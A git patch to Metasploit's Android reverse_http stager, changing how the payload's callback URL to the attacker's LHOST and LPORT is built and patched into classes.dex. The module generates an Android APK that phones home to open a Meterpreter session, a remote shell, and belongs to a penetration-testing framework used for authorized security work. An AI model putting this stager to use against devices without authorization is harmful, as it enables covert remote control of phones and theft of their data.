From ebd20fbedd074e4e81e6ec2e4677cf670619c3f4 Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Tue, 19 May 2015 16:25:46 +0100
Subject: [PATCH] fix http

---
 .../payloads/stagers/android/reverse_http.rb  | 19 ++++++++++++-------
 1 file changed, 12 insertions(+), 7 deletions(-)

diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
index 6c8274a8b9..1830d5ae62 100644
--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -27,23 +27,28 @@ module Metasploit3
   end
 
   def generate_jar(opts={})
-    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
-    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
-    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
 
-    jar = Rex::Zip::Jar.new
+    lurl = "ZZZZhttp://#{datastore["LHOST"]}"
+    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    lurl << "/"
+    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + host + ":" + port)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
     apply_options(classes)
 
+    jar = Rex::Zip::Jar.new
     jar.add_file("classes.dex", fix_dex_header(classes))
-
     files = [
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-
     jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
     jar.build_manifest